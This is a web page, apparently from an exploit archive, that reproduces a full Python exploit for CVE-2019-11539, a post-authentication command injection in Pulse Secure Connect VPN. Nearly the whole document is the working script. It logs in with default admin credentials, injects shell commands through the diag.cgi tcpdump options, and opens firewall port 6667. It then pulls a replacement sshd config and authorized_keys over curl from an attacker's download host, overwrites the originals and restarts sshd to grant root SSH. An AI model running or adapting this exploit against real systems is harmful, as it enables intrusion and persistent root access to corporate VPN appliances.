扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 |
#!/usr/bin/python # # Exploit Title: Pulse Secure Post-Auth Remote Code Execution # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 09/05/2019 # Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_) # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: linux # CVE : CVE-2019-11539 # # Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_) # # Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN # Downloads Modified SSH configuration and authorized_keys file to allow SSH as root. # You will need your own configuration and authorized_keys files. # # Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539 # Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html # # Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization. # We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free. # # Imports import requests import urllib from bs4 import BeautifulSoup # Host information host = '' # Host to exploit login_url = '/dana-na/auth/url_admin/login.cgi' # Login page CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code # Login Credentials user = 'admin' # Default Username password = 'password' # Default Password # Necessary for Curl downloadHost = '' # IP or FQDN for host running webserver port = '' # Port where web service is running. Needs to be a string, hence the quotes. # Proxy Configuration # Uncomment if you need to use a proxy or for debugging requests proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', } # Headers for requests headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded', } # Cookies to send with request cookies = { 'lastRealm':'Admin%20Users', 'DSSIGNIN':'url_admin', 'DSSignInURL':'/admin/', 'DSPERSISTMSG':'', } # Data for post request loginData = { 'tz_offset': 0, 'username': user, 'password': password, 'realm': 'Admin Users', 'btnSubmit': 'Sign In', } s = requests.Session() # Sets up the session s.proxies = proxies # Sets up the proxies # Disable Warnings from requests library requests.packages.urllib3.disable_warnings() # Administrator Login logic # Probably wouldn't have figured this out without help from @buffaloverflow def adminLogin(): global xsAuth global _headers # Send the intial request r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies) print('[#] Logging in...') # Self Explanatory r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request print('[#] Sent Login Request...') # Login Logic if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""): referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer r = s.get(referer, verify=False) # Sends a get request soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr print('[#] Grabbing xsauth...') xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token print('[!] Got xsauth: ' + xsAuth) # Self Explanatory data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page _headers = headers # Sets the headers _headers.update({'referer':referer}) # Updates the headers r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request print('[+] Logged in!') # Self Explanatory # Command injection logic def cmdInject(command): r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies) if r.status_code == 200: soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token payload = { 'a':'td', 'chkInternal':'On', 'optIFInternal':'int0', 'pmisc':'on', 'filter':'', 'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command, 'toggle':'Start+Sniffing', 'xsauth':xsAuth } # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")} # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run # Sends the get request to overwrite the template r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies) # Sends the get request to execute the code r = s.get('https://' + host + CommandExecURL, verify=False) # Main logic if __name__ == '__main__': adminLogin() try: print('[!] Starting Exploit') print('[*] Opening Firewall port...') cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port print('[*] Downloading Necessary Files....') cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys print('[*] Backing up Files...') cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys print('[*] Overwriting Old Files...') cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys print('[*] Restarting SSHD...') cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP print('[!] Done Exploiting the system.') print('[!] Please use the following command:') print('[!] ssh -p6667 root@%s') %(host) except Exception as e: raise |
体验盒子
